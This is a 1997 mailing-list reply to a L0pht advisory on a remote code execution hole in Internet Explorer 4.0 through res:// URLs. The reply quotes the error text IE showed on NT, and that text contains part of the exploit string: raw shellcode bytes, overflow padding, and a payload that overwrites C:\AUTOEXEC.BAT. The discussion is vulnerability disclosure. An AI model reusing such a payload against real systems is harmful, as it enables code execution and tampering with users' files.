Re: L0pht Advisory: IE4.0

[dleblanc () MINDSPRING COM (David LeBlanc)]

At 03:43 PM 11/10/97 -0500, DilDog wrote:
>      Document:  L0pht Security Advisory
>    URL Origin:  http://l0pht.com/advisories.html
>  Release Date:  November 1st, 1997
>   Application:  Microsoft Internet Explorer 4.0 Suite
>      Severity:  Viewing remote HTML content can execute arbitrary native
code
>        Author:  dildog () l0pht com
> Operating Sys:  Windows 95
>
> ---------------------------------------------------------------------------
---

Hmmm - all it does on NT is:

Internet Explorer cannot open the Internet site

res://¸ÄA؀-€€€€‹Ø3ɀÁª Ù±_  €â ˆ CâöPj ºíÂX ê    R»·ò÷¿€ï
€ÿÓZZP3Û³ Sƒë SP»à€ù¿ÿÓƒì XP3Û³9S» Òç ë   SP»°Êù¿ÿÓƒÄ »Ï€ù¿ÿӐ»°¯
ø¿ÿӐÌÌ-------------C:\AUTOEXEC.BAT€ ECHO MICRO$OFT 0WNZ YOU... REPENT
AND BE SAVED! PAUSE €----------------AAAABBBBC  ¾¿DDDEDÁW/

The filename or extension is too long.

Of course, you did say it applied to Win95...

OTOH, I'm _really_ disappointed - I've been hearing that since I was
running IE 4.0 that I could be owned.  Thought for a minute or two that I
might need to start using netcat as my browser.




David LeBlanc           |Why would you want to have your desktop user,
dleblanc () mindspring com |your mere mortals, messing around with a 32-bit
                        |minicomputer-class computing environment?
                        |Scott McNealy